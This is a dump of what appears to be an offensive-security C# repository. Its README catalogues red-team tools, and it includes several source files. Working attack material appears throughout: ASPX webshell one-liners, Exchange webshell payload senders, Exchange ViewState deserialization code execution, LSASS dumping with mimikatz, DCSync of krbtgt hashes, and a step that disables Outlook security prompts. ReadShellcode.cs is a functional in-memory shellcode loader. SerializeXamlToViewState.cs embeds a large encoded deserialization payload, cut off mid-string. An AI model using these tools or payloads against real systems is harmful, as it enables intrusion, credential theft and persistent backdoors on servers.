[《通过.NET实现内存加载PE文件》](https://3gstudent.github.io/3gstudent.github.io/%E9%80%9A%E8%BF%87.NET%E5%AE%9E%E7%8E%B0%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BDPE%E6%96%87%E4%BB%B6/) 184 | 185 | --- 186 | 187 | ### AddMachineAccountofDomain.cs 188 | 189 | Reference:https://github.com/pkb1s/SharpAllowedToAct 190 | 191 | This code is just part of SharpAllowedToAct. 192 | 193 | It can be used to add a Machine Account(User:testNew,Password:123456789). 194 | 195 | This code can be complied by csc.exe or Visual Studio. 196 | 197 | Supprot .Net 3.5 or later. 198 | 199 | Complie: 200 | 201 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll` 202 | 203 | or 204 | 205 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll` 206 | 207 | --- 208 | 209 | ### mapi_tool.cs 210 | 211 | Use MAPI to manage Outlook. 212 | 213 | This code can be complied by csc.exe or Visual Studio. 214 | 215 | Supprot .Net 3.5 or later. 216 | 217 | Complie: 218 | 219 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll` 220 | 221 | or 222 | 223 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll` 224 | 225 | ``` 226 | Usage: 227 | mapi_tool.exe GetAllFolders 228 | mapi_tool.exe GetConfig 229 | mapi_tool.exe ListMail 230 | mapi_tool.exe ListUnreadMail 231 | Ex command: 232 | mapi_tool.exe GetConfigEx 233 | mapi_tool.exe GetContactsEx 234 | mapi_tool.exe GetGlobalAddressEx 235 | mapi_tool.exe ListMailEx 236 | mapi_tool.exe ListUnreadMailEx 237 | mapi_tool.exe SaveAttachment 238 | :Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail 239 | Note: 240 | When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt. 241 | You can modify the registry to turn off the Outlook security prompt. 242 | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2 243 | ``` 244 | 245 | ### Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll 246 | 247 | Use for Outlook 2010. 248 | 249 | ### Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll 250 | 251 | Use for Outlook 2013. 252 | 253 | --- 254 | 255 | ### BrailleToASCII.cs 256 | 257 | Use to translate Braille Patterns to ASCII characters. 258 | 259 | Support:`1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$` 260 | 261 | This code can be complied by csc.exe or Visual Studio. 262 | 263 | Supprot .Net 3.5 or later. 264 | 265 | Complie: 266 | 267 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs` 268 | 269 | or 270 | 271 | `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs` 272 | 273 | --- 274 | 275 | ### SSLCertScan 276 | 277 | Use to scan the website SSL certificate. 278 | 279 | Reference:https://github.com/ryanries/SharpTLSScan 280 | 281 | This code can be complied by csc.exe or Visual Studio. 282 | 283 | Supprot .Net 3.5 or later. 284 | 285 | Complie: 286 | 287 | ``` 288 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs 289 | 290 | or 291 | 292 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs 293 | ``` 294 | 295 | --- 296 | 297 | ### SharpSSHCheck_SSH.NET.cs 298 | 299 | Use to check the valid credential of SSH(Based on SSH.NET). 300 | 301 | Support password and privatekeyfile. 302 | 303 | Reference:https://github.com/sshnet/SSH.NET 304 | 305 | Note: 306 | 307 | You need to reference Renci.SshNet.dll. 308 | 309 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 310 | 311 | Complie: 312 | 313 | ``` 314 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll 315 | ``` 316 | 317 | Usage: 318 | 319 | ``` 320 | SharpSSHCheck_SSH.NET.exe 321 | : 322 | - plaintext 323 | - keyfile 324 | ``` 325 | Eg: 326 | 327 | ``` 328 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor 329 | SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa 330 | ``` 331 | 332 | ### SharpSSHRunCmd_SSH.NET 333 | 334 | Remote command execution via SSH(Based on SSH.NET). 335 | 336 | Support password and privatekeyfile. 337 | 338 | Reference:https://github.com/sshnet/SSH.NET 339 | 340 | Note: 341 | 342 | You need to reference Renci.SshNet.dll. 343 | 344 | You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip 345 | 346 | Complie: 347 | 348 | ``` 349 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll 350 | ``` 351 | 352 | Usage: 353 | 354 | ``` 355 | SharpSSHRunCmd_SSH.NET.exe 356 | : 357 | - plaintext 358 | - keyfile 359 | If the is shell,you will get an interactive shell. 360 | ``` 361 | 362 | Eg: 363 | 364 | ``` 365 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell 366 | SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps 367 | ``` 368 | 369 | --- 370 | 371 | ### ListUserMailbyLDAP 372 | 373 | Use to export all users' mail by LDAP. 374 | 375 | Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs 376 | 377 | Complie: 378 | 379 | ``` 380 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 381 | or 382 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll 383 | ``` 384 | 385 | Usage: 386 | 387 | ``` 388 | ListUserMailbyLDAP 389 | ``` 390 | 391 | Eg: 392 | 393 | ``` 394 | ListUserMailbyLDAP.exe 192.168.1.1 test1 password1 395 | ``` 396 | 397 | 398 | ### List_passwordneverexpires_user_byLDAP 399 | 400 | Use to export all users with password_never_expires by LDAP. 401 | 402 | 403 | Complie: 404 | 405 | ``` 406 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 407 | or 408 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 409 | ``` 410 | 411 | Usage: 412 | 413 | ``` 414 | List_passwordneverexpires_user_byLDAP 415 | ``` 416 | 417 | Eg: 418 | 419 | ``` 420 | List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1 421 | ``` 422 | 423 | ### Add_passwordneverexpires_user_byLDAP 424 | 425 | Use to set the selected user with password_never_expires by LDAP. 426 | 427 | Complie: 428 | 429 | ``` 430 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 431 | or 432 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll 433 | ``` 434 | 435 | Usage: 436 | 437 | ``` 438 | Add_passwordneverexpires_user_byLDAP 439 | ``` 440 | Eg: 441 | 442 | ``` 443 | Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1 444 | ``` 445 | 446 | --- 447 | 448 | ### SqlClient.cs 449 | 450 | From:https://github.com/FortyNorthSecurity/SqlClient 451 | 452 | Use to query the MSSQL database. 453 | 454 | Complie: 455 | 456 | ``` 457 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs 458 | ``` 459 | 460 | or 461 | 462 | ``` 463 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs 464 | ``` 465 | 466 | --- 467 | 468 | ### SharpADFindDemo.cs 469 | 470 | Use to export the AD data by LDAP. 471 | Complie: 472 | 473 | ``` 474 | C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 475 | or 476 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll 477 | ``` 478 | 479 | Usage: 480 | 481 | ``` 482 | SharpADFindDemo 483 | 484 | command: 485 | - user 486 | - machine 487 | - group 488 | - ou 489 | - username 490 | - machinename 491 | - groupname 492 | - ouname 493 | 494 | ``` 495 | 496 | Note:The maxsize is 1000. 497 | 498 | Eg: 499 | 500 | ``` 501 | SharpADFindDemo.exe 192.168.1.1 test1 password1 user 502 | ``` 503 | 504 | 505 | --- 506 | 507 | ### SharpExchangeBackdoor.cs 508 | 509 | Python Version: [SharpExchangeBackdoor.py](https://github.com/3gstudent/Homework-of-Python/blob/master/SharpExchangeBackdoor.py) 510 | 511 | Use to send payload to the Exchange webshell backdoor. 512 | 513 | Support: 514 | 515 | - assemblyLoad 516 | - webshellWrite 517 | 518 | Usage: 519 | 520 | ``` 521 | 522 | mode: 523 | assemblyLoad 524 | webshellWrite 525 | ``` 526 | 527 | eg. 528 | 529 | ``` 530 | SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll 531 | SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx 532 | ``` 533 | 534 | assemblyLoad.aspx: 535 | 536 | ``` 537 | <%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%> 538 | ``` 539 | 540 | webshellWrite.aspx: 541 | 542 | ``` 543 | <%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%> 544 | ``` 545 | 546 | --- 547 | 548 | ## XamlToViewState.cs 549 | 550 | Use to create viewstate from XAML file 551 | 552 | Usage: 553 | 554 | ``` 555 | 556 | ``` 557 | eg. 558 | 559 | ``` 560 | XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF 561 | ``` 562 | 563 | ## SerializeXamlToViewState.cs 564 | 565 | Use to create viewstate from Serialize Xaml data. 566 | 567 | ## SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs 568 | 569 | ## SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs 570 | 571 | ## SharpExchangeDeserializeShell-NoAuth-ghostfile.cs 572 | 573 | Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs 574 | 575 | Use to test the deserializing code execution of Exchange. 576 | From read and write permissions of Exchange files to deserializing code execution. 577 | You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy\\web.config to implement deserializing code execution. 578 | ``:owa or ecp 579 | Usage: 580 | 581 | ``` 582 | 583 | ``` 584 | 585 | eg. 586 | 587 | ``` 588 | 192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa 589 | mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp 590 | ``` 591 | 592 | --- 593 | 594 | ## SharpExchangeDumpHash.cs 595 | 596 | Use to send payload to the Exchange webshell backdoor. 597 | The communication is encrypted by AES. 598 | 599 | Support function: 600 | 601 | - generate : generate the webshell 602 | - dumplsass: save the dump file of LSASS to C:\\Windows\\Temp\\lsass.bin 603 | - parsedump: use mimikatz to load C:\\Windows\\Temp\\lsass.bin and save the results to C:\\Windows\\Temp\\mimikatz.log 604 | 605 | Usage: 606 | 607 | ``` 608 | 609 | ``` 610 | 611 | mode: 612 | 613 | - generate 614 | - dumplsass 615 | - parsedump 616 | 617 | eg. 618 | 619 | ``` 620 | SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass 621 | SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump 622 | ``` 623 | 624 | --- 625 | 626 | ## SharpDCSync_krbtgt.cs 627 | 628 | Use DRSR protocol to ask a domain controller to get the krbtgt's hash. 629 | 630 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 631 | 632 | ## SharpDCSync.cs 633 | 634 | use DRSR protocol to ask a domain controller to synchronize a specified entry. 635 | 636 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 637 | 638 | --- 639 | 640 | ## SharpTGTImporter.cs 641 | 642 | Use to import the TGT 643 | 644 | Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin 645 | 646 | --- 647 | ## SharpGetUserLoginIPRPC.cs 648 | 649 | Use RPC to get the login IP of domain users through the event log. 650 | 651 | Support local and remote access 652 | 653 | ## SharpGetUserLoginIPWMI.cs 654 | 655 | Use WMI to get the login IP of domain users through the event log. 656 | 657 | Support local and remote access 658 | 659 | --- 660 | -------------------------------------------------------------------------------- /ReadShellcode.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | 6 | namespace ReadShellcode 7 | { 8 | class Program 9 | { 10 | static void Main(string[] args) 11 | { 12 | try 13 | { 14 | String Base64String = File.ReadAllText(@"ShellcodeBase64.txt"); 15 | byte[] shellcode64 = Convert.FromBase64String(Base64String); 16 | 17 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode64.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); 18 | Marshal.Copy(shellcode64, 0, (IntPtr)(funcAddr), shellcode64.Length); 19 | IntPtr hThread = IntPtr.Zero; 20 | UInt32 threadId = 0; 21 | IntPtr pinfo = IntPtr.Zero; 22 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); 23 | WaitForSingleObject(hThread, 0xFFFFFFFF); 24 | } 25 | catch (Exception ex) 26 | { 27 | Console.WriteLine(ex.Message); 28 | } 29 | 30 | } 31 | 32 | private static UInt32 MEM_COMMIT = 0x1000; 33 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 34 | [DllImport("kernel32")] 35 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); 36 | [DllImport("kernel32")] 37 | private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId); 38 | [DllImport("kernel32")] 39 | private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 40 | 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /SSLCertScan.cs: -------------------------------------------------------------------------------- 1 | 2 | using System; 3 | using System.Collections.Generic; 4 | using System.Linq; 5 | using System.Net.Security; 6 | using System.Net.Sockets; 7 | using System.Text.RegularExpressions; 8 | using System.Security.Cryptography; 9 | using System.Security.Cryptography.X509Certificates; 10 | 11 | namespace SSLCertScan 12 | { 13 | class Program 14 | { 15 | static void ShowUsage() 16 | { 17 | string Usage = @" 18 | SSLCertScan 19 | Use to scan the website SSL certificate. 20 | Modified by 3gstudent 21 | Reference:https://github.com/ryanries/SharpTLSScan 22 | 23 | Usage: 24 | SSLCertScan.exe 25 | Eg: 26 | SSLCertScan.exe 192.168.1.1 443 27 | "; 28 | Console.WriteLine(Usage); 29 | } 30 | static void Main(string[] args) 31 | { 32 | if (args.Length != 2) 33 | ShowUsage(); 34 | else 35 | { 36 | try 37 | { 38 | cpClient tcpClient = new TcpClient(args[0], Convert.ToInt32(args[1])); 39 | Console.WriteLine("[+] " + args[0] + " responds to TCP on " + args[1] + ".\n"); 40 | SslStream sslStream = new SslStream(tcpClient.GetStream(), true, CertificateValidationCallBack); 41 | sslStream.AuthenticateAsClient(args[0]); 42 | Console.WriteLine("SChannel negotiated the following:\n"); 43 | Console.WriteLine("Protocol Version : " + sslStream.SslProtocol); 44 | Console.WriteLine("Cipher Algorithm : " + sslStream.CipherAlgorithm); 45 | Console.WriteLine("Cipher Strength : " + sslStream.CipherStrength + " bits"); 46 | Console.WriteLine("Hash Algorithm : " + sslStream.HashAlgorithm); 47 | Console.WriteLine("Hash Strength : " + sslStream.HashStrength + " bits"); 48 | Console.Write("Key Exchange Algorithm: "); 49 | if (sslStream.KeyExchangeAlgorithm.ToString() == "44550") 50 | Console.WriteLine("ECDH Ephemeral"); 51 | else 52 | Console.WriteLine(sslStream.KeyExchangeAlgorithm); 53 | Console.WriteLine("Key Exchange Strength : " + sslStream.KeyExchangeStrength + " bits"); 54 | } 55 | catch (Exception ex) 56 | { 57 | Console.WriteLine("[!] " + ex.Message); 58 | return; 59 | } 60 | } 61 | 62 | } 63 | private static bool CertificateValidationCallBack(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors) 64 | { 65 | // Certificate2 is better than Certificate1, right? 66 | X509Certificate2 cert = (X509Certificate2)certificate; 67 | 68 | string[] subjectPieces = splitDN(cert.Subject); 69 | 70 | Console.Write("Certificate Subject : "); 71 | for (int x = 0; x < subjectPieces.Length; x++) 72 | { 73 | if (x == 0) 74 | Console.WriteLine(subjectPieces[x]); 75 | else 76 | Console.WriteLine(" " + subjectPieces[x]); 77 | } 78 | 79 | string[] issuerPieces = splitDN(cert.Issuer); 80 | 81 | Console.Write("Certificate Issuer : "); 82 | for (int x = 0; x < issuerPieces.Length; x++) 83 | { 84 | if (x == 0) 85 | Console.WriteLine(issuerPieces[x]); 86 | else 87 | Console.WriteLine(" " + issuerPieces[x]); 88 | } 89 | 90 | Console.WriteLine("Certificate Begins : " + cert.NotBefore); 91 | Console.WriteLine("Certificate Expires : " + cert.NotAfter); 92 | Console.WriteLine("Certificate Version : " + cert.Version); 93 | if (cert.SignatureAlgorithm.FriendlyName.ToLower().Contains("md5")) 94 | { 95 | Console.WriteLine("Signature Algorithm : " + cert.SignatureAlgorithm.FriendlyName + " (" + cert.SignatureAlgorithm.Value + ")"); 96 | } 97 | else 98 | { 99 | Console.WriteLine("Signature Algorithm : " + cert.SignatureAlgorithm.FriendlyName + " (" + cert.SignatureAlgorithm.Value + ")"); 100 | } 101 | Console.WriteLine("Key Exchange Algorithm: " + cert.PublicKey.Key.KeyExchangeAlgorithm); 102 | Console.WriteLine("Public Key Algorithm : " + new System.Security.Cryptography.Oid(cert.GetKeyAlgorithm()).FriendlyName); 103 | Console.WriteLine("Public Key Size : " + cert.PublicKey.Key.KeySize); 104 | byte[] RSAkey = cert.GetPublicKey(); 105 | string strRSAkey = ""; 106 | for (int i = 0; i < RSAkey.Length; i++) 107 | { 108 | strRSAkey += RSAkey[i].ToString("X2"); 109 | } 110 | Console.WriteLine("Public Key : " + strRSAkey); 111 | 112 | foreach (X509Extension extension in cert.Extensions) 113 | { 114 | if (extension.Oid.FriendlyName == "Subject Alternative Name") 115 | { 116 | AsnEncodedData asnData = new AsnEncodedData(extension.Oid, extension.RawData); 117 | string[] sans = asnData.Format(false).Split(','); 118 | Console.Write("Alternative Names : "); 119 | for (int x = 0; x < sans.Length; x++) 120 | { 121 | if (x == 0) 122 | Console.WriteLine(sans[x]); 123 | else 124 | Console.WriteLine(" " + sans[x]); 125 | } 126 | } 127 | } 128 | Console.Write("Certificate Validated : "); 129 | if (sslPolicyErrors == SslPolicyErrors.None) 130 | { 131 | Console.WriteLine("Yes"); 132 | } 133 | else 134 | { 135 | Console.WriteLine("No (" + sslPolicyErrors + ")"); 136 | } 137 | return true; 138 | } 139 | 140 | private static string[] splitDN(string input) 141 | { 142 | string[] splitString = input.Split(','); 143 | List correctedSplitString = new List(); 144 | int index = 0; 145 | foreach (string part in splitString) 146 | { 147 | if (part.Contains('=')) 148 | { 149 | correctedSplitString.Add(part.Trim()); 150 | index++; 151 | } 152 | else 153 | { 154 | if (index > 0) 155 | correctedSplitString[index - 1] = correctedSplitString[index - 1] + ", " + part.Trim(); 156 | else 157 | correctedSplitString.Add(part.Trim()); 158 | index++; 159 | } 160 | } 161 | return correctedSplitString.ToArray(); 162 | } 163 | } 164 | 165 | } 166 | -------------------------------------------------------------------------------- /SerializeXamlToViewState.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Security.Cryptography; 5 | using System.Globalization; 6 | 7 | public static class SerializeXamlToViewState 8 | { 9 | public class Program 10 | { 11 | static byte[] strToHexByte(string hexString) 12 | { 13 | if ((hexString.Length % 2) != 0) 14 | hexString += " "; 15 | byte[] returnBytes = new byte[hexString.Length / 2]; 16 | for (int i = 0; i < returnBytes.Length; i++) 17 | returnBytes[i] = Convert.ToByte(hexString.Substring(i * 2, 2), 16); 18 | return returnBytes; 19 | } 20 | static string CreateViewState(byte[] dat,string generator,string key) 21 | { 22 | MemoryStream ms = new MemoryStream(); 23 | byte[] validationKey= strToHexByte(key); 24 | 25 | uint _clientstateid = 0; 26 | if(!uint.TryParse(generator, NumberStyles.HexNumber, CultureInfo.InvariantCulture, out _clientstateid)) 27 | { 28 | System.Environment.Exit(0); 29 | } 30 | 31 | byte[] _mackey = new byte[4]; 32 | _mackey[0] = (byte)_clientstateid; 33 | _mackey[1] = (byte)(_clientstateid >> 8); 34 | _mackey[2] = (byte)(_clientstateid >> 16); 35 | _mackey[3] = (byte)(_clientstateid >> 24); 36 | 37 | ms = new MemoryStream(); 38 | ms.Write(dat,0,dat.Length); 39 | ms.Write(_mackey,0,_mackey.Length); 40 | byte[] hash=(new HMACSHA1(validationKey)).ComputeHash(ms.ToArray()); 41 | ms=new MemoryStream(); 42 | ms.Write(dat,0,dat.Length); 43 | ms.Write(hash,0,hash.Length); 44 | return Convert.ToBase64String(ms.ToArray()); 45 | } 46 | 47 | static void Main(string[] args) 48 | { 49 | string xaml_payload = "/wEyiF0AAQAAAP////8BAAAAAAAAAAwCAAAAV1N5c3RlbS5XaW5kb3dzLkZvcm1zLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQUBAAAAIVN5c3RlbS5XaW5kb3dzLkZvcm1zLkF4SG9zdCtTdGF0ZQEAAAARUHJvcGVydHlCYWdCaW5hcnkHAgIAAAAJAwAAAA8DAAAAxy0AAAIAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgUAAAgICQIAAAAKAAAACgAAABACAAAAEAAAAAkDAAAACQQAAAAJBQAAAAkGAAAACQcAAAAJCAAAAAkJAAAACQoAAAAJCwAAAAkMAAAADQYHAwAAAAEBAAAAAQAAAAcCCQ0AAAAMDgAAAGFTeXN0ZW0uV29ya2Zsb3cuQ29tcG9uZW50TW9kZWwsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQQAAABqU3lzdGVtLldvcmtmbG93LkNvbXBvbmVudE1vZGVsLlNlcmlhbGl6YXRpb24uQWN0aXZpdHlTdXJyb2dhdGVTZWxlY3RvcitPYmplY3RTdXJyb2dhdGUrT2JqZWN0U2VyaWFsaXplZFJlZgIAAAAEdHlwZQttZW1iZXJEYXRhcwMFH1N5c3RlbS5Vbml0eVNlcmlhbGl6YXRpb25Ib2xkZXIOAAAACQ8AAAAJEAAAAAEFAAAABAAAAAkRAAAACRIAAAABBgAAAAQAAAAJEwAAAAkUAAAAAQcAAAAEAAAACRUAAAAJFgAAAAEIAAAABAAAAAkXAAAACRgAAAABCQAAAAQAAAAJGQAAAAkaAAAAAQoAAAAEAAAACRsAAAAJHAAAAAELAAAABAAAAAkdAAAACR4AAAAEDAAAABxTeXN0ZW0uQ29sbGVjdGlvbnMuSGFzaHRhYmxlBwAAAApMb2FkRmFjdG9yB1ZlcnNpb24IQ29tcGFyZXIQSGFzaENvZGVQcm92aWRlcghIYXNoU2l6ZQRLZXlzBlZhbHVlcwAAAwMABQULCBxTeXN0ZW0uQ29sbGVjdGlvbnMuSUNvbXBhcmVyJFN5c3RlbS5Db2xsZWN0aW9ucy5JSGFzaENvZGVQcm92aWRlcgjsUTg/AgAAAAoKAwAAAAkfAAAACSAAAAAPDQAAAAAQAAACTVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAITrY2AAAAAAAAAAAOAAAiELAQsAAAgAAAAGAAAAAAAAficAAAAgAAAAQAAAAAAAEAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACAAAAAAgAAAAAAAAMAQIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAACgnAABTAAAAAEAAAKgCAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAhAcAAAAgAAAACAAAAAIAAAAAAAAAAAAAAAAAACAAAGAucnNyYwAAAKgCAAAAQAAAAAQAAAAKAAAAAAAAAAAAAAAAAABAAABALnJlbG9jAAAMAAAAAGAAAAACAAAADgAAAAAAAAAAAAAAAAAAQAAAQgAAAAAAAAAAAAAAAAAAAABgJwAAAAAAAEgAAAACAAUAdCEAALQFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwBAAmAAAAAQAAEQJvAwAACgoWCysOBgcGB5MfeGHRnQcXWAsHBo5pMuwGcwQAAAoqAAAbMAMA0QAAAAIAABECKAUAAAooBgAACgoGbwcAAApvCAAACgZvCQAACm8KAAAKcwsAAAoLB28MAAAKcgEAAHBvDQAACgZvDgAACm8PAAAKchEAAHBvEAAACgwIKAEAAAYMB28MAAAKciEAAHAIKBEAAApvEgAACgdvDAAAChdvEwAACgdvDAAAChdvFAAACgdvDAAAChZvFQAACgdvFgAACiYHbxcAAApvGAAACg0JKAEAAAYNBm8JAAAKCW8ZAAAK3gMm3gAGbwkAAApvGgAACgZvCQAACm8bAAAKKgAAAAEQAAAAACIAlbcAAw4AAAFCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAADkAQAAI34AAFACAACEAgAAI1N0cmluZ3MAAAAA1AQAACwAAAAjVVMAAAUAABAAAAAjR1VJRAAAABAFAACkAAAAI0Jsb2IAAAAAAAAAAgAAAUcVAgAJAAAAAPolMwAWAAABAAAADgAAAAIAAAACAAAAAQAAABsAAAACAAAAAgAAAAEAAAADAAAAAAAKAAEAAAAAAAYAKQAiAAYAXAA8AAYAfAA8AAYAowAiAAoAwQC2AAoA2QC2AAoAAQG2AA4ANAEhAQ4APAEhAQoAaAG2AA4AnwGAAQYAMwIpAgYAUwIpAgYAeAIiAAAAAAABAAAAAAABAAEAAAAQABcAAAAFAAEAAQBQIAAAAACRADAACgABAIQgAAAAAIYYNAAPAAIAAAABADoAEQA0ABMAGQA0AA8AIQCqABgAIQA0AB0ACQA0AA8AKQDNADIAKQDrADcAMQD2AA8AKQAOATwAOQAbAQ8AQQA0AA8AQQBNAUEASQBbAUYAKQB0AUsAUQCzAVAAWQC8AVUAIQDFAVoASQDMAUYASQDaAWAASQD1AWAASQAPAmAAQQAjAmUAQQBAAmkAaQBeAm4AOQBoAkYAOQBuAg8AOQB0Ag8ALgALAHsALgATAIQAIwByAASAAAAAAAAAAAAAAAAAAAAAAJoAAAAEAAAAAAAAAAAAAAABABkAAAAAAAQAAAAAAAAAAAAAACkAtgAAAAAABAAAAAAAAAAAAAAAAQAiAAAAAAAAAAAAADxNb2R1bGU+ADNndjVrZHpwLmRsbABFAG1zY29ybGliAFN5c3RlbQBPYmplY3QAeG9yAC5jdG9yAHMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAFJ1bnRpbWVDb21wYXRpYmlsaXR5QXR0cmlidXRlADNndjVrZHpwAFN0cmluZwBUb0NoYXJBcnJheQBTeXN0ZW0uV2ViAEh0dHBDb250ZXh0AGdldF9DdXJyZW50AEh0dHBTZXJ2ZXJVdGlsaXR5AGdldF9TZXJ2ZXIAQ2xlYXJFcnJvcgBIdHRwUmVzcG9uc2UAZ2V0X1Jlc3BvbnNl